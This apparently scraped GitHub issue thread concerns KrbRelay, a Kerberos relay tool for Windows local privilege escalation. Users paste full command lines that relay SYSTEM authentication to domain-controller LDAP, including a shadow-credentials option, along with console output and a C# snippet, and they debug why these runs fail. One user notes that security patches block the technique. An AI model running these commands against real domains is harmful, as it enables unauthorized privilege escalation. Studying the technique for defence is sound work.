Comments (7)
cube0x0
commented on August 17, 2024
hi!
use FQDN in the spn parameter and try the latest version i just pushed
from krbrelay.
darkr4y
commented on August 17, 2024
I have tried the latest version and the spn param with FQDN, the whole command like KrbRelay.exe -spn ldap/WIN-1TCHOPTDEJ5.tempad.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -console
and the same error returned:
[*] Relaying context: tempad.local\PC-01$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] CoInitializeSecurity hResult 0x80010119
[*] GetModuleFileName: C:\Users\test1\Desktop\kerberosRelay\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACyVuRV/xS6Pa9PMFEoKzG1AoAAAJAU//8q63PhyIL6VyIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing SYSTEM authentication
[*] Using CLSID: 90f18417-f0f1-484e-9d3c-59dceee5dbd8
[*] apReq: 05000b0710000000db00330002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2060006002d00000005000500280000000a0063450000000f50432d303154454d504144
[*] bind: 49
[*] ldap_get_option: LDAP_INVALID_CREDENTIALS
[-] Ldap failed
I just review james forshaw's article found that maybe the problem is about CoInitializeSecurity
I modified the code in Program.cs line 865 to print the return value
Console.WriteLine("[*] Init com server");
var hResult = CoInitializeSecurity(IntPtr.Zero, svcs.Length, svcs,
IntPtr.Zero, AuthnLevel.RPC_C_AUTHN_LEVEL_DEFAULT,
ImpLevel.RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero,
Natives.EOLE_AUTHENTICATION_CAPABILITIES.EOAC_DYNAMIC_CLOAKING,
IntPtr.Zero);
string hResultStr = "0x" + hResult.ToString("X");
Console.WriteLine("[*] CoInitializeSecurity hResult {0}", hResultStr);
from krbrelay.
cube0x0
commented on August 17, 2024
a valid apReq starts with "60", you cannot expect it to work with an invalid apReq :p
check your environment and parameters
from krbrelay.
NickYan7
commented on August 17, 2024
a valid apReq starts with "60", you cannot expect it to work with an invalid apReq :p check your environment and parameters
I got same error however my apReq starts with 60 which is valid packet as you said...
Besides, I also got error [*] ldap_modify: LDAP_NO_SUCH_OBJECT , I had tried FQDN, hostname with $ & hostname only, none of them worked, please check this, thanks a lot!!
Tested on Win10 1909 & Win10 20H2, the DC is Server 16.
from krbrelay.
NickYan7
commented on August 17, 2024
when I use FQDN, it printed like this:
[*] System.ArgumentNullException: value cannot be null
The command is krbrelay.exe -spn ldap/dc.local.com -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred pc$.local.com -port 10.
And I'm sure the apReq starts with 60.
from krbrelay.
ecote7
commented on August 17, 2024
when I use FQDN, it printed like this:
[*] System.ArgumentNullException: value cannot be nullThe command is
krbrelay.exe -spn ldap/dc.local.com -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred pc$.local.com -port 10.And I'm sure the apReq starts with
60.
Same issue here. Anyone found a solution ?
from krbrelay.
ecote7
commented on August 17, 2024
It looks like it has been patched. https://blog.0patch.com/2022/08/micropatching-krbrelay-local-privilege.html
It works when I uninstall the MS Security patches installed (in November in my case).
from krbrelay.
Related Issues (13)
- Invalid apReq HOT 2
- Not work when DN contains other language
- "Supported Protocols and Features" update
- Reflective load of KrbRelay
- Error "System.ArgumentNullException: Value cannot be null" HOT 3
- Help Wanted - ldap_modify: LDAP_OPERATIONS_ERROR
- LDAP console / LDAP "-add-groupmember" command HOT 4
- Reading GMSA passwords HOT 3
- Could not bind to SCMR, Could not start remoteregistry error HOT 1
- Could not open service handle, wrong name? HOT 1
- LDAP_INSUFFICIENT_ACCESS - Correct or not? HOT 4
- Error "the service cannot be started" HOT 2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
π Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. πππ
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google β€οΈ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from krbrelay.